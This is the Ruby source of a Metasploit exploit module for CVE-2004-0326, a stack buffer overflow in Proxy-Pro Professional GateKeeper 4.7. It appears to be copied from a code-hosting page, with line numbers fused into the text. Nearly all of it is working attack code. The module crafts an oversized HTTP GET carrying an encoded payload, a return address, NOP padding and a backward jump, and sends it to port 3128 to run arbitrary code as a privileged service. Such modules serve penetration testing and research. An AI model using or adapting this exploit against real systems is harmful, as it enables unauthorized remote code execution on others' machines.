Path: blob/master/modules/exploits/windows/proxy/proxypro_http_get.rb
19812 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow',15'Description' => %q{16This module exploits a stack buffer overflow in Proxy-Pro Professional17GateKeeper 4.7. By sending a long HTTP GET to the default port18of 3128, a remote attacker could overflow a buffer and execute19arbitrary code.20},21'Author' => 'MC',22'License' => MSF_LICENSE,23'References' => [24['CVE', '2004-0326'],25['OSVDB', '4027'],26['BID', '9716'],27],28'DefaultOptions' => {29'EXITFUNC' => 'process',30},31'Payload' => {32'Space' => 500,33'BadChars' => "\x00+&=%\x0a\x0d\x20",34'StackAdjustment' => -3500,35},36'Platform' => 'win',37'Targets' => [38[ 'Proxy-Pro GateKeeper 4.7', { 'Ret' => 0x03b1e121 } ], # GKService.exe39],40'Privileged' => true,41'DisclosureDate' => '2004-02-23',42'DefaultTarget' => 0,43'Notes' => {44'Reliability' => UNKNOWN_RELIABILITY,45'Stability' => UNKNOWN_STABILITY,46'SideEffects' => UNKNOWN_SIDE_EFFECTS47}48)49)5051register_options(52[53Opt::RPORT(3128)54]55)56end5758def exploit59connect6061print_status("Trying target #{target.name}...")6263sploit = "GET /" + rand_text_english(3603, payload_badchars)64sploit += payload.encoded + [target.ret].pack('V') + make_nops(10)65sploit += "\xe9" + [-497].pack('V') + " HTTP/1.0" + "\r\n\r\n"6667sock.put(sploit)68sock.get_once(-1, 3)6970handler71disconnect72end73end747576